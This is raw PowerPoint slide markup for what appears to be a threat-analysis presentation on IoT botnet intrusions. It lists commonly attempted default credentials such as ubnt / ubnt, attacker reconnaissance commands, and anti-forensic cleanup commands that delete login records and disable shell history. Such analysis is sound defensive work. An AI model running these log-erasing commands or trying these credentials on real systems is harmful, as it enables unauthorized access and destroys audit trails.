                  <a:pt x="895350" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="895350" y="59128"/>
                  <a:pt x="878278" y="76200"/>
                  <a:pt x="8572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7" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6453188" y="3957638"/>
            <a:ext cx="5114925" cy="771525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="771525">
                <a:moveTo>
                  <a:pt x="38098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076827" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097868" y="0"/>
                  <a:pt x="5114925" y="17057"/>
                  <a:pt x="5114925" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="733427"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="754468"/>
                  <a:pt x="5097868" y="771525"/>
                  <a:pt x="5076827" y="771525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38098" y="771525"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17057" y="771525"/>
                  <a:pt x="0" y="754468"/>
                  <a:pt x="0" y="733427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610350" y="4114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572250" y="41148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29450" y="4152900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/ root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17746" y="4152900"/>
            <a:ext cx="466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15.2%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610350" y="4495800"/>
            <a:ext cx="4800600" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4800600" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762500" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4783528" y="0"/>
                  <a:pt x="4800600" y="17072"/>
                  <a:pt x="4800600" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800600" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800600" y="59128"/>
                  <a:pt x="4783528" y="76200"/>
                  <a:pt x="4762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43" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="4495800"/>
            <a:ext cx="733425" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="733425" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="695325" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="716353" y="0"/>
                  <a:pt x="733425" y="17072"/>
                  <a:pt x="733425" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="733425" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="733425" y="59128"/>
                  <a:pt x="716353" y="76200"/>
                  <a:pt x="6953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4" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6453188" y="4852988"/>
            <a:ext cx="5114925" cy="847725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="847725">
                <a:moveTo>
                  <a:pt x="38097" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076828" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097868" y="0"/>
                  <a:pt x="5114925" y="17057"/>
                  <a:pt x="5114925" y="38097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="809628"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="830668"/>
                  <a:pt x="5097868" y="847725"/>
                  <a:pt x="5076828" y="847725"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38097" y="847725"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17057" y="847725"/>
                  <a:pt x="0" y="830668"/>
                  <a:pt x="0" y="809628"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="38097"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17057"/>
                  <a:pt x="17057" y="0"/>
                  <a:pt x="3809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8F8F8F">
                <a:alpha val="4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6610350" y="50482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8F8F">
              <a:alpha val="2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572250" y="504825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029450" y="5010150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ubnt / ubnt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029450" y="5238750"/>
            <a:ext cx="1066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Ubiquiti IoT devices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011942" y="5086350"/>
            <a:ext cx="476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12.8%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610350" y="5467350"/>
            <a:ext cx="4800600" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4800600" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762500" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4783528" y="0"/>
                  <a:pt x="4800600" y="17072"/>
                  <a:pt x="4800600" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800600" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800600" y="59128"/>
                  <a:pt x="4783528" y="76200"/>
                  <a:pt x="4762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51" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="5467350"/>
            <a:ext cx="619125" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="619125" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="581025" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="602053" y="0"/>
                  <a:pt x="619125" y="17072"/>
                  <a:pt x="619125" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="619125" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="619125" y="59128"/>
                  <a:pt x="602053" y="76200"/>
                  <a:pt x="581025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8F8F"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6453188" y="5824538"/>
            <a:ext cx="5114925" cy="771525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="771525">
                <a:moveTo>
                  <a:pt x="38098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076827" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097868" y="0"/>
                  <a:pt x="5114925" y="17057"/>
                  <a:pt x="5114925" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="733427"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="754468"/>
                  <a:pt x="5097868" y="771525"/>
                  <a:pt x="5076827" y="771525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38098" y="771525"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17057" y="771525"/>
                  <a:pt x="0" y="754468"/>
                  <a:pt x="0" y="733427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8F8F8F">
                <a:alpha val="40000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6610350" y="5981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8F8F">
              <a:alpha val="20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572250" y="59817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029450" y="6019800"/>
            <a:ext cx="1638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FEFE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 / support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1102876" y="6019800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9.1%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610350" y="6362700"/>
            <a:ext cx="4800600" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4800600" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762500" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4783528" y="0"/>
                  <a:pt x="4800600" y="17072"/>
                  <a:pt x="4800600" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800600" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800600" y="59128"/>
                  <a:pt x="4783528" y="76200"/>
                  <a:pt x="4762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58" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="6362700"/>
            <a:ext cx="438150" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="438150" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400050" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="421078" y="0"/>
                  <a:pt x="438150" y="17072"/>
                  <a:pt x="438150" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="438150" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="438150" y="59128"/>
                  <a:pt x="421078" y="76200"/>
                  <a:pt x="4000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8F8F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5763" y="385763"/>
            <a:ext cx="1381125" cy="314325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1381125" h="314325">
                <a:moveTo>
                  <a:pt x="38099" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1343026" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1364067" y="0"/>
                  <a:pt x="1381125" y="17058"/>
                  <a:pt x="1381125" y="38099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1381125" y="276226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1381125" y="297267"/>
                  <a:pt x="1364067" y="314325"/>
                  <a:pt x="1343026" y="314325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38099" y="314325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="314325"/>
                  <a:pt x="0" y="297267"/>
                  <a:pt x="0" y="276226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04825" y="476250"/>
            <a:ext cx="1196578" cy="161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spc="45" kern="0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Lifecycle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1915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Methodology: Post-Exploitation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509713"/>
            <a:ext cx="3695700" cy="4181475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3695700" h="418147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105270"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3695700" y="4147357"/>
                  <a:pt x="3661582" y="4181475"/>
                  <a:pt x="3619495" y="4181475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="4181475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="4181475"/>
                  <a:pt x="0" y="4147357"/>
                  <a:pt x="0" y="41052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14375" y="1838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1704975"/>
            <a:ext cx="143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52525" y="1895475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Reconnaissance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314575"/>
            <a:ext cx="337185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Once authenticated, attackers immediately verify system resources and capabilities to assess the target's value and suitability for botnet recruitment.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5788" y="3121819"/>
            <a:ext cx="3295650" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="2105025">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257549" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278592" y="0"/>
                  <a:pt x="3295650" y="17058"/>
                  <a:pt x="3295650" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="2066924"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="2087967"/>
                  <a:pt x="3278592" y="2105025"/>
                  <a:pt x="3257549" y="2105025"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="2105025"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="2105025"/>
                  <a:pt x="0" y="2087967"/>
                  <a:pt x="0" y="20669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04850" y="3240881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Common Commands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4850" y="34694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uname -a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57250" y="36980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Kernel &amp; architecture info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04850" y="38885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 /proc/cpuinfo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57250" y="41171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CPU specifications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04850" y="43076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df -h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57250" y="45362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Disk space availability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04850" y="47267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free -m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57250" y="49553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Memory utilization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5313" y="535543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ubicBezTo>
                  <a:pt x="0" y="25608"/>
                  <a:pt x="25608" y="0"/>
                  <a:pt x="57150" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="51792" y="26789"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="51792" y="57150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="51792" y="58936"/>
                  <a:pt x="52685" y="60610"/>
                  <a:pt x="54181" y="61615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75612" y="75902"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="78068" y="77554"/>
                  <a:pt x="81394" y="76885"/>
                  <a:pt x="83046" y="74407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84698" y="71929"/>
                  <a:pt x="84028" y="68625"/>
                  <a:pt x="81550" y="66973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="62508" y="54293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62508" y="26789"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62508" y="23820"/>
                  <a:pt x="60119" y="21431"/>
                  <a:pt x="57150" y="21431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54181" y="21431"/>
                  <a:pt x="51792" y="23820"/>
                  <a:pt x="51792" y="2678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2" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752475" y="5345906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Duration: 5-15 seconds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46513" y="1509713"/>
            <a:ext cx="3695700" cy="4181475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3695700" h="418147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105270"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3695700" y="4147357"/>
                  <a:pt x="3661582" y="4181475"/>
                  <a:pt x="3619495" y="4181475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="4181475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="4181475"/>
                  <a:pt x="0" y="4147357"/>
                  <a:pt x="0" y="41052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441775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4563219" y="18383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66415" y="154781"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="112179" y="154781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136475" y="130485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71921" y="65931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24780" y="113072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66452" y="154744"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="83344" y="178594"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66415" y="178594"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="60089" y="178594"/>
                  <a:pt x="54025" y="176101"/>
                  <a:pt x="49560" y="171636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6325" y="128364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2270" y="124309"/>
                  <a:pt x="0" y="118839"/>
                  <a:pt x="0" y="113109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="107379"/>
                  <a:pt x="2270" y="101910"/>
                  <a:pt x="6325" y="97854"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97854" y="6325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="101910" y="2270"/>
                  <a:pt x="107379" y="0"/>
                  <a:pt x="113109" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118839" y="0"/>
                  <a:pt x="124309" y="2270"/>
                  <a:pt x="128364" y="6325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="196081" y="74042"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="200137" y="78098"/>
                  <a:pt x="202406" y="83567"/>
                  <a:pt x="202406" y="89297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="202406" y="95027"/>
                  <a:pt x="200137" y="100496"/>
                  <a:pt x="196081" y="104552"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="145852" y="154781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190500" y="154781"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="197086" y="154781"/>
                  <a:pt x="202406" y="160102"/>
                  <a:pt x="202406" y="166688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="202406" y="173273"/>
                  <a:pt x="197086" y="178594"/>
                  <a:pt x="190500" y="178594"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83344" y="178594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6" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5013275" y="1704975"/>
            <a:ext cx="76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2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13275" y="1895475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Cleanup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41775" y="2314575"/>
            <a:ext cx="337185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Attackers systematically erase traces of intrusion to evade detection and forensic analysis, removing command history and log entries.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46538" y="3121819"/>
            <a:ext cx="3295650" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="2105025">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257549" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278592" y="0"/>
                  <a:pt x="3295650" y="17058"/>
                  <a:pt x="3295650" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="2066924"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="2087967"/>
                  <a:pt x="3278592" y="2105025"/>
                  <a:pt x="3257549" y="2105025"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="2105025"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="2105025"/>
                  <a:pt x="0" y="2087967"/>
                  <a:pt x="0" y="20669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4565600" y="3240881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Evasion Techniques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565600" y="34694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history -c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718000" y="36980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Clear bash history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565600" y="38885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rm -rf /var/log/lastlog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718000" y="41171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Remove login records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65600" y="43076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unset HISTFILE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718000" y="45362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Disable history logging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565600" y="47267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export HISTSIZE=0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718000" y="49553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history buffer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456063" y="535543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ubicBezTo>
                  <a:pt x="0" y="25608"/>
                  <a:pt x="25608" y="0"/>
                  <a:pt x="57150" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="51792" y="26789"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="51792" y="57150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="51792" y="58936"/>
                  <a:pt x="52685" y="60610"/>
                  <a:pt x="54181" y="61615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75612" y="75902"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="78068" y="77554"/>
                  <a:pt x="81394" y="76885"/>
                  <a:pt x="83046" y="74407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84698" y="71929"/>
                  <a:pt x="84028" y="68625"/>
                  <a:pt x="81550" y="66973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="62508" y="54293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62508" y="26789"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62508" y="23820"/>
                  <a:pt x="60119" y="21431"/>
                  <a:pt x="57150" y="21431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54181" y="21431"/>
                  <a:pt x="51792" y="23820"/>
                  <a:pt x="51792" y="2678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0" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613225" y="5345906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Duration: 3-8 seconds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07263" y="1509713"/>
            <a:ext cx="3695700" cy="4181475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3695700" h="4181475">
                <a:moveTo>
                  <a:pt x="76205" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3619495" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3661582" y="0"/>
                  <a:pt x="3695700" y="34118"/>
                  <a:pt x="3695700" y="76205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3695700" y="4105270"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3695700" y="4147357"/>
                  <a:pt x="3661582" y="4181475"/>
                  <a:pt x="3619495" y="4181475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76205" y="4181475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34118" y="4181475"/>
                  <a:pt x="0" y="4147357"/>
                  <a:pt x="0" y="41052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302526" y="17049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435876" y="18383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0133" y="14883"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110133" y="6660"/>
                  <a:pt x="103473" y="0"/>
                  <a:pt x="95250" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87027" y="0"/>
                  <a:pt x="80367" y="6660"/>
                  <a:pt x="80367" y="14883"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80367" y="31291"/>
                  <a:pt x="60536" y="39477"/>
                  <a:pt x="48927" y="27905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43123" y="22101"/>
                  <a:pt x="33710" y="22101"/>
                  <a:pt x="27868" y="27905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22027" y="33710"/>
                  <a:pt x="22064" y="43123"/>
                  <a:pt x="27868" y="48964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39477" y="60573"/>
                  <a:pt x="31254" y="80404"/>
                  <a:pt x="14846" y="80404"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6623" y="80404"/>
                  <a:pt x="-37" y="87064"/>
                  <a:pt x="-37" y="95287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37" y="103510"/>
                  <a:pt x="6623" y="110170"/>
                  <a:pt x="14846" y="110170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31254" y="110170"/>
                  <a:pt x="39439" y="130001"/>
                  <a:pt x="27868" y="141610"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22064" y="147414"/>
                  <a:pt x="22064" y="156828"/>
                  <a:pt x="27868" y="162669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33672" y="168511"/>
                  <a:pt x="43086" y="168473"/>
                  <a:pt x="48927" y="162669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60536" y="151061"/>
                  <a:pt x="80367" y="159283"/>
                  <a:pt x="80367" y="175692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80367" y="183914"/>
                  <a:pt x="87027" y="190574"/>
                  <a:pt x="95250" y="190574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103473" y="190574"/>
                  <a:pt x="110133" y="183914"/>
                  <a:pt x="110133" y="175692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110133" y="159283"/>
                  <a:pt x="129964" y="151098"/>
                  <a:pt x="141573" y="162669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147377" y="168473"/>
                  <a:pt x="156790" y="168473"/>
                  <a:pt x="162632" y="162669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168473" y="156865"/>
                  <a:pt x="168436" y="147451"/>
                  <a:pt x="162632" y="141610"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="151023" y="130001"/>
                  <a:pt x="159246" y="110170"/>
                  <a:pt x="175654" y="110170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183877" y="110170"/>
                  <a:pt x="190537" y="103510"/>
                  <a:pt x="190537" y="95287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190537" y="87064"/>
                  <a:pt x="183877" y="80404"/>
                  <a:pt x="175654" y="80404"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159246" y="80404"/>
                  <a:pt x="151061" y="60573"/>
                  <a:pt x="162632" y="48964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168436" y="43160"/>
                  <a:pt x="168436" y="33747"/>
                  <a:pt x="162632" y="27905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="156828" y="22064"/>
                  <a:pt x="147414" y="22101"/>
                  <a:pt x="141573" y="27905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="129964" y="39477"/>
                  <a:pt x="110133" y="31291"/>
                  <a:pt x="110133" y="14883"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59531" y="83344"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59531" y="76773"/>
                  <a:pt x="64866" y="71438"/>
                  <a:pt x="71438" y="71438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78009" y="71438"/>
                  <a:pt x="83344" y="76773"/>
                  <a:pt x="83344" y="83344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83344" y="89915"/>
                  <a:pt x="78009" y="95250"/>
                  <a:pt x="71438" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64866" y="95250"/>
                  <a:pt x="59531" y="89915"/>
                  <a:pt x="59531" y="83344"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="119063" y="95250"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="125634" y="95250"/>
                  <a:pt x="130969" y="100585"/>
                  <a:pt x="130969" y="107156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130969" y="113727"/>
                  <a:pt x="125634" y="119063"/>
                  <a:pt x="119063" y="119063"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112491" y="119063"/>
                  <a:pt x="107156" y="113727"/>
                  <a:pt x="107156" y="107156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107156" y="100585"/>
                  <a:pt x="112491" y="95250"/>
                  <a:pt x="119063" y="9525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44" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8874026" y="1704975"/>
            <a:ext cx="809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874026" y="1895475"/>
            <a:ext cx="838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Infection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02526" y="2314575"/>
            <a:ext cx="3371850" cy="647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phase involves downloading and executing malicious payloads to convert the compromised host into a botnet node for DDoS attacks.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307288" y="3121819"/>
            <a:ext cx="3295650" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3295650" h="2105025">
